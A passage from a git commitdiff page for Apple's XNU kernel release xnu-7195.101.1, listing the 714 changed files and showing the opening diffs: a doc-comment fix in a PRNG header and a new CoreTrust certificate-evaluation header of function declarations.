git.saurik.com Git - apple/xnu.git / commitdiff
xnu-7195.101.1 (tags: master, macos-113, v7195.101.1; snapshot: xnu-7195.101.1.tar.gz)
author    Apple <opensource@apple.com>    Tue, 27 Apr 2021 01:04:15 +0000 (01:04 +0000)
committer Apple <opensource@apple.com>    Tue, 27 Apr 2021 01:04:15 +0000 (01:04 +0000)
714 files changed:
EXTERNAL_HEADERS/corecrypto/cckprng.h
EXTERNAL_HEADERS/coretrust/CTEvaluate.h [new file with mode: 0644]
EXTERNAL_HEADERS/stdint.h
Makefile
SETUP/setsegname/setsegname.c
bsd/arm/vmparam.h
bsd/conf/files
bsd/crypto/entropy/Makefile
bsd/crypto/entropy/entropy_sysctl.c
bsd/crypto/entropy/entropy_sysctl.h [deleted file]
bsd/dev/arm/dtrace_isa.c
bsd/dev/arm/munge.c
bsd/dev/arm/stubs.c
bsd/dev/arm64/dtrace_isa.c
bsd/dev/dtrace/dtrace.c
bsd/dev/dtrace/dtrace_glue.c
bsd/dev/dtrace/dtrace_subr.c
bsd/dev/dtrace/fasttrap.c
bsd/dev/dtrace/fbt.c
bsd/dev/dtrace/fbt_blacklist.c
bsd/dev/dtrace/lockstat.c
bsd/dev/dtrace/sdt_subr.c
bsd/dev/dtrace/systrace.c
bsd/dev/i386/dtrace_isa.c
bsd/dev/i386/sysctl.c
bsd/dev/mem.c
bsd/dev/monotonic.c
bsd/dev/munge.c
bsd/kern/bsd_init.c
bsd/kern/bsd_stubs.c
bsd/kern/counter_test.c [new file with mode: 0644]
bsd/kern/decmpfs.c
bsd/kern/imageboot.c
bsd/kern/kdebug.c
bsd/kern/kern_acct.c
bsd/kern/kern_authorization.c
bsd/kern/kern_control.c
bsd/kern/kern_core.c
bsd/kern/kern_credential.c
bsd/kern/kern_cs.c
bsd/kern/kern_descrip.c
bsd/kern/kern_event.c
bsd/kern/kern_exec.c
bsd/kern/kern_exit.c
bsd/kern/kern_fork.c
bsd/kern/kern_guarded.c
bsd/kern/kern_kpc.c
bsd/kern/kern_ktrace.c
bsd/kern/kern_lockf.c
bsd/kern/kern_memorystatus.c
bsd/kern/kern_memorystatus_freeze.c
bsd/kern/kern_mib.c
bsd/kern/kern_mman.c
bsd/kern/kern_newsysctl.c
bsd/kern/kern_ntptime.c
bsd/kern/kern_overrides.c
bsd/kern/kern_persona.c
bsd/kern/kern_proc.c
bsd/kern/kern_prot.c
bsd/kern/kern_resource.c
bsd/kern/kern_shutdown.c
bsd/kern/kern_sig.c
bsd/kern/kern_sysctl.c
bsd/kern/kern_time.c
bsd/kern/kern_xxx.c
bsd/kern/kpi_mbuf.c
bsd/kern/kpi_socket.c
bsd/kern/kpi_socketfilter.c
bsd/kern/mach_loader.c
bsd/kern/mcache.c
bsd/kern/policy_check.c
bsd/kern/posix_sem.c
bsd/kern/posix_shm.c
bsd/kern/proc_uuid_policy.c
bsd/kern/subr_eventhandler.c
bsd/kern/subr_sbuf.c
bsd/kern/sys_generic.c
bsd/kern/sys_persona.c
bsd/kern/sys_reason.c
bsd/kern/syscalls.master
bsd/kern/sysv_msg.c
bsd/kern/sysv_sem.c
bsd/kern/sysv_shm.c
bsd/kern/trace_codes
bsd/kern/tty.c
bsd/kern/tty_ptmx.c
bsd/kern/ubc_subr.c
bsd/kern/uipc_domain.c
bsd/kern/uipc_mbuf.c
bsd/kern/uipc_socket.c
bsd/kern/uipc_syscalls.c
bsd/kern/uipc_usrreq.c
bsd/kern/vsock_domain.c
bsd/man/man2/clonefile.2
bsd/man/man2/mount.2
bsd/miscfs/bindfs/bind_subr.c
bsd/miscfs/bindfs/bind_vnops.c
bsd/miscfs/bindfs/bindfs.h
bsd/miscfs/devfs/devfs_fdesc_support.c
bsd/miscfs/devfs/devfs_tree.c
bsd/miscfs/devfs/devfs_vfsops.c
bsd/miscfs/mockfs/mockfs.h
bsd/miscfs/mockfs/mockfs_vfsops.c
bsd/miscfs/nullfs/null_subr.c
bsd/miscfs/nullfs/null_vfsops.c
bsd/miscfs/nullfs/null_vnops.c
bsd/miscfs/nullfs/nullfs.h
bsd/miscfs/routefs/routefs_ops.c
bsd/miscfs/specfs/spec_vnops.c
bsd/net/classq/classq.h
bsd/net/classq/classq_fq_codel.c
bsd/net/classq/classq_fq_codel.h
bsd/net/classq/classq_subr.c
bsd/net/classq/if_classq.h
bsd/net/content_filter.c
bsd/net/dlil.c
bsd/net/if_vlan.c
bsd/net/kext_net.h
bsd/net/necp.c
bsd/net/necp.h
bsd/net/necp_client.c
bsd/net/pktsched/pktsched_fq_codel.c
bsd/net/pktsched/pktsched_fq_codel.h
bsd/net/radix.c
bsd/net/route.c
bsd/net/route.h
bsd/net/skywalk_stubs.c
bsd/netinet/cpu_in_cksum_gen.c
bsd/netinet/flow_divert.c
bsd/netinet/icmp6.h
bsd/netinet/icmp_var.h
bsd/netinet/in_pcb.c
bsd/netinet/in_pcb.h
bsd/netinet/in_systm.h
bsd/netinet/ip_icmp.c
bsd/netinet/mptcp.c
bsd/netinet/mptcp_opt.c
bsd/netinet/mptcp_subr.c
bsd/netinet/mptcp_usrreq.c
bsd/netinet/mptcp_var.h
bsd/netinet/raw_ip.c
bsd/netinet/tcp.h
bsd/netinet/tcp_input.c
bsd/netinet/tcp_output.c
bsd/netinet/tcp_subr.c
bsd/netinet/tcp_timer.c
bsd/netinet/tcp_usrreq.c
bsd/netinet/tcp_var.h
bsd/netinet/udp_usrreq.c
bsd/netinet6/icmp6.c
bsd/netinet6/in6_proto.c
bsd/nfs/gss/gss_krb5_mech.c
bsd/nfs/gss/gss_krb5_mech.h
bsd/nfs/nfs.h
bsd/nfs/nfs4_subs.c
bsd/nfs/nfs4_vnops.c
bsd/nfs/nfs_bio.c
bsd/nfs/nfs_gss.c
bsd/nfs/nfs_gss.h
bsd/nfs/nfs_lock.c
bsd/nfs/nfs_lock.h
bsd/nfs/nfs_node.c
bsd/nfs/nfs_serv.c
bsd/nfs/nfs_socket.c
bsd/nfs/nfs_srvcache.c
bsd/nfs/nfs_subs.c
bsd/nfs/nfs_syscalls.c
bsd/nfs/nfs_upcall.c
bsd/nfs/nfs_vfsops.c
bsd/nfs/nfs_vnops.c
bsd/nfs/nfsmount.h
bsd/nfs/nfsnode.h
bsd/nfs/nfsrvcache.h
bsd/pthread/pthread_shims.c
bsd/pthread/pthread_workqueue.c
bsd/security/audit/audit_arg.c
bsd/security/audit/audit_mac.c
bsd/security/audit/audit_session.c
bsd/sys/buf.h
bsd/sys/buf_internal.h
bsd/sys/commpage.h
bsd/sys/conf.h
bsd/sys/dtrace_impl.h
bsd/sys/event.h
bsd/sys/eventhandler.h
bsd/sys/imageboot.h
bsd/sys/kasl.h
bsd/sys/kauth.h
bsd/sys/kdebug.h
bsd/sys/kern_memorystatus.h
bsd/sys/kern_memorystatus_freeze.h
bsd/sys/lockf.h
bsd/sys/malloc.h
bsd/sys/mbuf.h
bsd/sys/mcache.h
bsd/sys/mman.h
bsd/sys/monotonic.h
bsd/sys/mount.h
bsd/sys/mount_internal.h
bsd/sys/munge.h
bsd/sys/proc.h
bsd/sys/proc_internal.h
bsd/sys/pthread_shims.h
bsd/sys/quota.h
bsd/sys/resource.h
bsd/sys/sbuf.h
bsd/sys/select.h
bsd/sys/semaphore.h
bsd/sys/socketvar.h
bsd/sys/sysctl.h
bsd/sys/systm.h
bsd/sys/tty.h
bsd/sys/ubc_internal.h
bsd/sys/ucred.h
bsd/sys/unpcb.h
bsd/sys/user.h
bsd/sys/vnode.h
bsd/sys/vnode_internal.h
bsd/sys/vsock_domain.h
bsd/sys/work_interval.h
bsd/sys_private/kdebug_private.h
bsd/tests/bsd_tests.c
bsd/vfs/kpi_vfs.c
bsd/vfs/vfs_bio.c
bsd/vfs/vfs_cache.c
bsd/vfs/vfs_fsevents.c
bsd/vfs/vfs_fslog.c
bsd/vfs/vfs_init.c
bsd/vfs/vfs_io_compression_stats.c [new file with mode: 0644]
bsd/vfs/vfs_io_compression_stats.h [new file with mode: 0644]
bsd/vfs/vfs_lookup.c
bsd/vfs/vfs_quota.c
bsd/vfs/vfs_subr.c
bsd/vfs/vfs_syscalls.c
bsd/vfs/vfs_xattr.c
bsd/vm/vm_unix.c
bsd/vm/vnode_pager.c
config/BSDKernel.exports
config/IOKit.exports
config/Libkern.exports
config/MASTER
config/MASTER.arm
config/MASTER.arm64
config/MASTER.arm64.BridgeOS
config/MASTER.arm64.MacOSX
config/MASTER.arm64.bcm2837
config/MASTER.arm64.iPhoneOS
config/MASTER.x86_64
config/MasterVersion
config/Private.arm.exports
config/Private.arm64.exports
config/Private.exports
config/Private.x86_64.exports
config/Unsupported.arm64.MacOSX.exports
config/Unsupported.exports
config/Unsupported.x86_64.MacOSX.exports
config/generate_symbolset_plist.sh
doc/allocators.md
doc/startup.md
iokit/DriverKit/IOService.iig
iokit/DriverKit/IOUserClient.iig
iokit/IOKit/IOKitKeysPrivate.h
iokit/IOKit/IOKitServer.h
iokit/IOKit/IOMemoryDescriptor.h
iokit/IOKit/IONVRAM.h
iokit/IOKit/IOPMGR.h
iokit/IOKit/IOPlatformExpert.h
iokit/IOKit/IOStatisticsPrivate.h
iokit/IOKit/IOUserServer.h
iokit/IOKit/pwr_mgt/IOPM.h
iokit/IOKit/pwr_mgt/IOPMPrivate.h
iokit/Kernel/IOBufferMemoryDescriptor.cpp
iokit/Kernel/IOCatalogue.cpp
iokit/Kernel/IODMACommand.cpp
iokit/Kernel/IOHibernateIO.cpp
iokit/Kernel/IOKitDebug.cpp
iokit/Kernel/IOKitKernelInternal.h
iokit/Kernel/IOLib.cpp
iokit/Kernel/IOMemoryDescriptor.cpp
iokit/Kernel/IONVRAM.cpp
iokit/Kernel/IOPMGR.cpp
iokit/Kernel/IOPMrootDomain.cpp
iokit/Kernel/IOPlatformExpert.cpp
iokit/Kernel/IOService.cpp
iokit/Kernel/IOStartIOKit.cpp
iokit/Kernel/IOStatistics.cpp
iokit/Kernel/IOUserClient.cpp
iokit/Kernel/IOUserServer.cpp
iokit/Kernel/arm/AppleARMSMP.cpp
iokit/Kernel/i386/IOKeyStoreHelper.cpp
iokit/Tests/Tests.cpp
iokit/bsddev/IOKitBSDInit.cpp
libkdd/kcdata.h
libkdd/kcdtypes.c
libkern/c++/OSKext.cpp
libkern/c++/OSRuntime.cpp
libkern/conf/files
libkern/coretrust/coretrust.c [new file with mode: 0644]
libkern/firehose/chunk_private.h
libkern/firehose/firehose_types_private.h
libkern/firehose/tracepoint_private.h
libkern/libkern/Makefile
libkern/libkern/OSKextLibPrivate.h
libkern/libkern/c++/OSKext.h
libkern/libkern/c++/OSString.h
libkern/libkern/coretrust/Makefile [new file with mode: 0644]
libkern/libkern/coretrust/coretrust.h [new file with mode: 0644]
libkern/libkern/ptrauth_utils.h
libkern/os/atomic_private_impl.h
libkern/os/hash.h
libkern/os/log.c
libkern/os/log_encode.c [new file with mode: 0644]
libkern/os/log_encode.h
libkern/os/log_encode_types.h
libkern/os/log_mem.c [new file with mode: 0644]
libkern/os/log_mem.h [new file with mode: 0644]
libkern/ptrauth_utils.c
libsa/conf/Makefile.template
libsyscall/Libsyscall.xcconfig
libsyscall/Libsyscall.xcodeproj/project.pbxproj
libsyscall/mach/.gitignore [deleted file]
libsyscall/mach/host.c
libsyscall/mach/mach/mach_init.h
libsyscall/mach/mach/port_descriptions.h
libsyscall/mach/mach_init.c
libsyscall/mach/mach_port.c
libsyscall/mach/mach_vm.c
libsyscall/mach/port_descriptions.c
libsyscall/mach/task.c [new file with mode: 0644]
libsyscall/wrappers/__commpage_gettimeofday.c
libsyscall/wrappers/_libkernel_init.c
libsyscall/wrappers/getiopolicy_np.c
libsyscall/wrappers/kdebug_trace.c
libsyscall/wrappers/mach_approximate_time.c
libsyscall/wrappers/mach_boottime.c
libsyscall/wrappers/mach_bridge_remote_time.c
libsyscall/xcodescripts/mach_install_mig.sh
makedefs/MakeInc.cmd
makedefs/MakeInc.def
osfmk/UserNotification/KUNCUserNotifications.c
osfmk/arm/arm_init.c
osfmk/arm/arm_vm_init.c
osfmk/arm/bsd_arm.c
osfmk/arm/counter.c [new file with mode: 0644]
osfmk/arm/cpu_capabilities.h
osfmk/arm/cpu_common.c
osfmk/arm/cpu_data_internal.h
osfmk/arm/locks_arm.c
osfmk/arm/machine_routines.c
osfmk/arm/machine_routines.h
osfmk/arm/machine_routines_apple.c
osfmk/arm/machine_routines_common.c
osfmk/arm/model_dep.c
osfmk/arm/pmap.c
osfmk/arm/pmap.h
osfmk/arm/proc_reg.h
osfmk/arm/rtclock.c
osfmk/arm/task.h
osfmk/arm64/Makefile
osfmk/arm64/amcc_rorgn.c
osfmk/arm64/arm_vm_init.c
osfmk/arm64/bsd_arm64.c
osfmk/arm64/caches_asm.s
osfmk/arm64/copyio.c
osfmk/arm64/cswitch.s
osfmk/arm64/exception_asm.h
osfmk/arm64/hibernate_restore.c
osfmk/arm64/kpc.c
osfmk/arm64/locore.s
osfmk/arm64/machine_routines.c
osfmk/arm64/machine_routines_asm.s
osfmk/arm64/monotonic.h
osfmk/arm64/monotonic_arm64.c
osfmk/arm64/pgtrace.c
osfmk/arm64/platform_tests.c
osfmk/arm64/platform_tests_asm.s
osfmk/arm64/proc_reg.h
osfmk/arm64/sleh.c
osfmk/arm64/smccc_asm.h [new file with mode: 0644]
osfmk/arm64/start.s
osfmk/arm64/tunables/tunables.s [deleted file]
osfmk/arm64/tunables/tunables_h10.s [deleted file]
osfmk/arm64/tunables/tunables_h11.s [deleted file]
osfmk/arm64/tunables/tunables_h12.s [deleted file]
osfmk/arm64/tunables/tunables_h13.s [deleted file]
osfmk/arm64/tunables/tunables_h7.s [deleted file]
osfmk/arm64/tunables/tunables_h8.s [deleted file]
osfmk/arm64/tunables/tunables_h9.s [deleted file]
osfmk/conf/Makefile.template
osfmk/conf/files
osfmk/conf/files.arm
osfmk/conf/files.arm64
osfmk/conf/files.x86_64
osfmk/console/serial_console.c
osfmk/console/serial_general.c
osfmk/corpses/corpse.c
osfmk/device/iokit_rpc.c
osfmk/i386/Makefile
osfmk/i386/acpi.c
osfmk/i386/bsd_i386.c
osfmk/i386/bsd_i386_native.c
osfmk/i386/cpu_capabilities.h
osfmk/i386/cpuid.c
osfmk/i386/cpuid.h
osfmk/i386/i386_init.c
osfmk/i386/locks_i386.c
osfmk/i386/machine_routines.c
osfmk/i386/pcb.c
osfmk/i386/pcb_native.c
osfmk/i386/phys.c
osfmk/i386/pmap.h
osfmk/i386/ucode.c
osfmk/i386/vmx/vmx_cpu.c
osfmk/i386/vmx/vmx_cpu.h
osfmk/i386/x86_hypercall.c [new file with mode: 0644]
osfmk/i386/x86_hypercall.h [new file with mode: 0644]
osfmk/ipc/ipc_entry.c
osfmk/ipc/ipc_entry.h
osfmk/ipc/ipc_eventlink.c
osfmk/ipc/ipc_importance.c
osfmk/ipc/ipc_init.c
osfmk/ipc/ipc_kmsg.c
osfmk/ipc/ipc_kmsg.h
osfmk/ipc/ipc_mqueue.c
osfmk/ipc/ipc_mqueue.h
osfmk/ipc/ipc_object.c
osfmk/ipc/ipc_object.h
osfmk/ipc/ipc_port.c
osfmk/ipc/ipc_port.h
osfmk/ipc/ipc_pset.c
osfmk/ipc/ipc_right.c
osfmk/ipc/ipc_right.h
osfmk/ipc/ipc_types.h
osfmk/ipc/ipc_voucher.c
osfmk/ipc/mach_debug.c
osfmk/ipc/mach_kernelrpc.c
osfmk/ipc/mach_msg.c
osfmk/ipc/mach_port.c
osfmk/ipc/port.h
osfmk/kdp/kdp_dyld.h
osfmk/kdp/ml/arm/kdp_machdep.c
osfmk/kern/Makefile
osfmk/kern/ast.c
osfmk/kern/audit_sessionport.c
osfmk/kern/bits.h
osfmk/kern/bsd_kern.c
osfmk/kern/coalition.c
osfmk/kern/counter.h [new file with mode: 0644]
osfmk/kern/counter_common.c [new file with mode: 0644]
osfmk/kern/counters.c [deleted file]
osfmk/kern/counters.h [deleted file]
osfmk/kern/cpu_quiesce.c
osfmk/kern/debug.c
osfmk/kern/debug.h
osfmk/kern/exception.c
osfmk/kern/gzalloc.c
osfmk/kern/host.c
osfmk/kern/host_statistics.h
osfmk/kern/hv_io_notifier.c [new file with mode: 0644]
osfmk/kern/hv_io_notifier.h [new file with mode: 0644]
osfmk/kern/hv_support_kext.c
osfmk/kern/hv_support_kext.h
osfmk/kern/hvg_hypercall.h [new file with mode: 0644]
osfmk/kern/ipc_host.c
osfmk/kern/ipc_kobject.c
osfmk/kern/ipc_kobject.h
osfmk/kern/ipc_mig.c
osfmk/kern/ipc_mig.h
osfmk/kern/ipc_misc.c
osfmk/kern/ipc_sync.c
osfmk/kern/ipc_tt.c
osfmk/kern/ipc_tt.h
osfmk/kern/kalloc.c
osfmk/kern/kcdata.h
osfmk/kern/kern_stackshot.c
osfmk/kern/kext_alloc.c
osfmk/kern/kext_alloc.h
osfmk/kern/lock_stat.h
osfmk/kern/locks.c
osfmk/kern/machine.c
osfmk/kern/policy_internal.h
osfmk/kern/printf.c
osfmk/kern/processor.c
osfmk/kern/processor.h
osfmk/kern/sched_amp.c
osfmk/kern/sched_average.c
osfmk/kern/sched_prim.c
osfmk/kern/simple_lock.h
osfmk/kern/startup.c
osfmk/kern/startup.h
osfmk/kern/suid_cred.c
osfmk/kern/sync_sema.c
osfmk/kern/syscall_subr.c
osfmk/kern/syscall_sw.c
osfmk/kern/syscall_sw.h
osfmk/kern/task.c
osfmk/kern/task.h
osfmk/kern/task_ident.c [new file with mode: 0644]
osfmk/kern/task_ident.h [new file with mode: 0644]
osfmk/kern/task_policy.c
osfmk/kern/task_swap.c [deleted file]
osfmk/kern/task_swap.h [deleted file]
osfmk/kern/telemetry.c
osfmk/kern/thread.c
osfmk/kern/thread.h
osfmk/kern/thread_act.c
osfmk/kern/thread_call.c
osfmk/kern/thread_call.h
osfmk/kern/thread_group.c
osfmk/kern/thread_group.h
osfmk/kern/turnstile.c
osfmk/kern/ux_handler.c
osfmk/kern/zalloc.c
osfmk/kern/zalloc.h
osfmk/kern/zalloc_internal.h
osfmk/kern/zcache.c [deleted file]
osfmk/kern/zcache_internal.h [deleted file]
osfmk/mach/Makefile
osfmk/mach/arm/traps.h
osfmk/mach/exception_types.h
osfmk/mach/host_special_ports.h
osfmk/mach/iocompressionstats_notification.defs [new file with mode: 0644]
osfmk/mach/kern_return.h
osfmk/mach/mach_traps.h
osfmk/mach/mach_types.defs
osfmk/mach/mach_types.h
osfmk/mach/mach_vm.defs
osfmk/mach/mach_voucher.defs
osfmk/mach/memory_object_types.h
osfmk/mach/port.h
osfmk/mach/syscall_sw.h
osfmk/mach/task.defs
osfmk/mach/task_access.defs
osfmk/mach/task_special_ports.h
osfmk/mach/thread_act.defs
osfmk/mach/thread_special_ports.h
osfmk/mach/vm_map.defs
osfmk/mach/vm_param.h
osfmk/mach/vm_statistics.h
osfmk/mach/vm_types.h
osfmk/mach_debug/ipc_info.h
osfmk/machine/machine_routines.h
osfmk/man/task_get_special_port.html
osfmk/man/task_set_special_port.html
osfmk/man/thread_get_special_port.html
osfmk/man/thread_set_special_port.html
osfmk/prng/entropy.c
osfmk/tests/bitmap_test.c
osfmk/tests/kernel_tests.c
osfmk/tests/ptrauth_data_tests.c
osfmk/vm/Makefile
osfmk/vm/bsd_vm.c
osfmk/vm/device_vm.c
osfmk/vm/lz4.h
osfmk/vm/memory_object.c
osfmk/vm/memory_object.h
osfmk/vm/pmap.h
osfmk/vm/vm_apple_protect.c
osfmk/vm/vm_compressor.c
osfmk/vm/vm_compressor.h
osfmk/vm/vm_compressor_backing_store.c
osfmk/vm/vm_compressor_backing_store.h
osfmk/vm/vm_compressor_pager.c
osfmk/vm/vm_fault.c
osfmk/vm/vm_fourk_pager.c
osfmk/vm/vm_init.c
osfmk/vm/vm_kern.c
osfmk/vm/vm_kern.h
osfmk/vm/vm_map.c
osfmk/vm/vm_map.h
osfmk/vm/vm_object.c
osfmk/vm/vm_object.h
osfmk/vm/vm_page.h
osfmk/vm/vm_pageout.c
osfmk/vm/vm_pageout.h
osfmk/vm/vm_phantom_cache.c
osfmk/vm/vm_protos.h
osfmk/vm/vm_purgeable.c
osfmk/vm/vm_resident.c
osfmk/vm/vm_shared_region.c
osfmk/vm/vm_shared_region.h
osfmk/vm/vm_shared_region_pager.c
osfmk/vm/vm_swapfile_pager.c
osfmk/vm/vm_tests.c
osfmk/vm/vm_user.c
osfmk/x86_64/copyio.c
osfmk/x86_64/counter.c [new file with mode: 0644]
osfmk/x86_64/pmap.c
pexpert/arm/pe_identify_machine.c
pexpert/arm/pe_init.c
pexpert/arm/pe_serial.c
pexpert/pexpert/arm/boot.h
pexpert/pexpert/arm64/apple_arm64_regs.h
pexpert/pexpert/arm64/board_config.h
pexpert/pexpert/arm64/boot.h
pexpert/pexpert/i386/boot.h
san/Kasan_kasan.exports
san/kasan-blacklist
san/kasan-fakestack.c
san/ksancov.c
san/memintrinsics.h
san/ubsan.c
san/ubsan.h
san/ubsan_log.c
security/mac_base.c
security/mac_framework.h
security/mac_iokit.c
security/mac_mach.c
security/mac_mach_internal.h
security/mac_policy.h
security/mac_process.c
tests/Makefile
tests/atm_diagnostic_flag_entitled.c
tests/benchmark/helpers.c [new file with mode: 0644]
tests/benchmark/helpers.h [new file with mode: 0644]
tests/counter/benchmark.c [new file with mode: 0644]
tests/counter/benchmark.lua [new file with mode: 0644]
tests/counter/common.c [new file with mode: 0644]
tests/counter/common.h [new file with mode: 0644]
tests/counter/counter.c [new file with mode: 0644]
tests/cpucount.c
tests/data_protection.c
tests/decompression_failure.c
tests/dev_zero.c [new file with mode: 0644]
tests/driverkit/Makefile
tests/driverkit/test_intentionally_crashing_driver_56101852/Info.plist [deleted file]
tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.cpp [deleted file]
tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.entitlements [deleted file]
tests/driverkit/test_intentionally_crashing_driver_56101852/test_intentionally_crashing_driver_56101852.iig [deleted file]
tests/drop_priv.c
tests/drop_priv.h [new file with mode: 0644]
tests/exc_helpers.c
tests/exc_helpers.h
tests/exception_ports_info.c [new file with mode: 0644]
tests/exception_tests.c [new file with mode: 0644]
tests/exception_tests.entitlements [new file with mode: 0644]
tests/exec-race-58566604.c [new file with mode: 0644]
tests/extract_right_soft_fail.c [new file with mode: 0644]
tests/fd_send.c [new file with mode: 0644]
tests/fp_exception.c
tests/hv_private.entitlements [deleted file]
tests/hv_public.entitlements [deleted file]
tests/hvtest_x86.m
tests/hvtest_x86_asm.s
tests/hvtest_x86_guest.h
tests/imm_pinned_control_port.c [new file with mode: 0644]
tests/imm_pinned_control_port_crasher.c [new file with mode: 0644]
tests/inspect_port.c [deleted file]
tests/ipc_mach_port.c [new file with mode: 0644]
tests/kdebug.c
tests/kernel_inspection.c [new file with mode: 0644]
tests/kqueue_file_tests.c
tests/launchd_plists/com.apple.xnu.test.mach_port.plist [new file with mode: 0644]
tests/lockf_uaf_poc/README [new file with mode: 0644]
tests/lockf_uaf_poc/lockf_uaf_poc_70587638.c [new file with mode: 0644]
tests/memorystatus_freeze_test.c
tests/memorystatus_is_assertion.c
tests/memorystatus_vm_map_fork.c
tests/perf_vmfault.c
tests/port_descriptions.c
tests/preoslog.c
tests/quiesce_counter.c
tests/read_inspect.c [new file with mode: 0644]
tests/recvmsg_x_test.c [new file with mode: 0644]
tests/restrict_jit.c [new file with mode: 0644]
tests/restrict_jit.entitlements [new file with mode: 0644]
tests/scm_rights_leak.c [new file with mode: 0644]
tests/socket_raw_uint8_max.c [new file with mode: 0644]
tests/stackshot_tests.m
tests/sysctl_get_owned_vmobjects.c
tests/sysctl_hw.c
tests/task_for_pid_entitlement.plist
tests/task_ident_test.c [new file with mode: 0644]
tests/task_info.c
tests/task_inspect.c [deleted file]
tests/task_inspect.entitlements [deleted file]
tests/task_is_self.c [new file with mode: 0644]
tests/test_dext_launch_56101852.c [deleted file]
tests/test_dext_launch_56101852.entitlements [deleted file]
tests/test_utils.c [new file with mode: 0644]
tests/test_utils.h [new file with mode: 0644]
tests/text_corruption.c [new file with mode: 0644]
tests/text_corruption_helper.c [new file with mode: 0644]
tests/thread_call_race_71455282.c [new file with mode: 0644]
tests/trial_experiments.c [new file with mode: 0644]
tests/trial_experiments.entitlements [new file with mode: 0644]
tests/vm/fault_throughput.c
tests/vm/page_size_globals.c [new file with mode: 0644]
tests/vm/perf_helpers.c [deleted file]
tests/vm/perf_helpers.h [deleted file]
tests/vm/perf_madvise.c
tests/vm/retired_pages.c [new file with mode: 0644]
tests/vm_test_code_signing_helper.c
tests/vm_test_mach_map.c
tests/xnu_quick_test.entitlements [deleted file]
tests/xnu_quick_test_entitled.c [deleted file]
tests/zalloc_buddy.c [new file with mode: 0644]
tools/lldbmacros/Makefile
tools/lldbmacros/core/kernelcore.py
tools/lldbmacros/core/syntax_checker.py
tools/lldbmacros/counter.py [new file with mode: 0755]
tools/lldbmacros/ipc.py
tools/lldbmacros/kasan.py
tools/lldbmacros/kcdata.py
tools/lldbmacros/ktrace.py
tools/lldbmacros/mbufs.py
tools/lldbmacros/memory.py
tools/lldbmacros/process.py
tools/lldbmacros/utils.py
tools/lldbmacros/xnu.py
tools/tests/Makefile
tools/tests/kernpost_test_report/Makefile [new file with mode: 0644]
tools/tests/kernpost_test_report/kernpost_test_report.m [new file with mode: 0644]
tools/tests/zero-to-n/zero-to-n.c

diff --git a/EXTERNAL_HEADERS/corecrypto/cckprng.h b/EXTERNAL_HEADERS/corecrypto/cckprng.h
index 79fe22fd3113fd687a5c1b3b013224aed0ef989c..d50b1d060a3d9692b6de868439a143b886e02504 100644 (file)
@@ -310,7 +310,6 @@ struct cckprng_funcs {
   @param seed_nbytes Length of the seed in bytes
   @param seed Pointer to a high-entropy seed
   @param nonce_nbytes Length of the nonce in bytes
-  @param seed Pointer to a single-use nonce
 
   @discussion @p max_ngens should be set based on an upper bound of CPUs available on the device. The entropy buffer should be managed outside the PRNG and updated continuously (e.g. by an interrupt handler). The count of samples in the entropy buffer needn't be better than a rough estimate.
 */
diff --git a/EXTERNAL_HEADERS/coretrust/CTEvaluate.h b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h
new file mode 100644 (file)
index 0000000..3be1d92
--- /dev/null
+++ b/EXTERNAL_HEADERS/coretrust/CTEvaluate.h
@@ -0,0 +1,215 @@
+//
+//  CoreTrust.h
+//  CoreTrust
+//
+//  Copyright © 2017-2020 Apple Inc. All rights reserved.
+//
+
+#ifndef _CORETRUST_EVALUATE_H_
+#define _CORETRUST_EVALUATE_H_
+
+#include <stdint.h>
+#include <stdbool.h>
+
+__BEGIN_DECLS
+
+typedef struct x509_octet_string {
+    const uint8_t *data;
+    size_t length;
+} CTAsn1Item;
+
+int CTParseCertificateSet(const uint8_t *der, const uint8_t *der_end,       // Input: binary representation of concatenated DER-encoded certs
+                          CTAsn1Item *certStorage, size_t certStorageLen,   // Output: An array of certStorageLen CTAsn1Items that will be populated with the
+                                                                            //    CTAsn1Item for each parsed cert (in the same order as input)
+                          size_t *numParsedCerts);                          // Output: number of successfully parsed certs
+
+int CTEvaluateSavageCerts(const uint8_t *certsData, size_t certsLen,
+                          const uint8_t *rootKeyData, size_t rootKeyLen,
+                          const uint8_t **leafKeyData, size_t *leafKeyLen,
+                          bool *isProdCert);
+
+int CTEvaluateSavageCertsWithUID(const uint8_t *certsData, size_t certsLen,
+                                 const uint8_t *rootKeyData, size_t rootKeyLen,
+                                 const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData
+                                 uint8_t *UIDData, size_t UIDLen,                 // Output: a pre-allocated buffer of UIDLen
+                                 bool *isProdCert);
+
+int CTEvaluateYonkersCerts(const uint8_t *certsData, size_t certsLen,
+                           const uint8_t *rootKeyData, size_t rootKeyLen,
+                           const uint8_t **leafKeyData, size_t *leafKeyLen, // Output: points to the leaf key data in the input certsData
+                           uint8_t *UIDData, size_t UIDLen,                 // Output: a pre-allocated buffer of UIDLen
+                           bool *isProdCert);
+
+int CTEvaluateAcrt(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of at most 3 concatenated certs
+                                                                      //         with leaf first (root may be omitted)
+                   const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+int CTEvaluateUcrt(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of exactly 3 concatenated
+                                                                      //        DER-encoded certs, with leaf first
+                   const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+int CTEvaluateUcrtTestRoot(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of exactly 3 concatenated
+                                                                              //        DER-encoded certs, with leaf first
+                           const uint8_t *rootKeyData, size_t rootKeyLen,     // Input: Root public key, if not specified production root will be used
+                           const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+int CTEvaluateBAASystem(const uint8_t *certsData, size_t certsLen,         // Input: binary representation of exactly 3 concatenated
+                                                                           //        DER-encoded certs, with leaf first
+                        const uint8_t **leafKeyData, size_t *leafKeyLen);  // Output: points to the leaf key data in the input certsData
+
+typedef struct baa_identity {
+    uint32_t chipId;
+    uint64_t ecid;
+    bool productionStatus;
+    bool securityMode;
+    uint8_t securityDomain;
+    CTAsn1Item img4;
+} CTBAAIdentity;
+
+int CTEvaluateBAASystemWithId(const uint8_t *certsData, size_t certsLen,        // Input: binary representation of exactly 3 concatenated
+                                                                                //        DER-encoded certs, with leaf first
+                              const uint8_t **leafKeyData, size_t *leafKeyLen,  // Output: points to the leaf key data in the input certsData
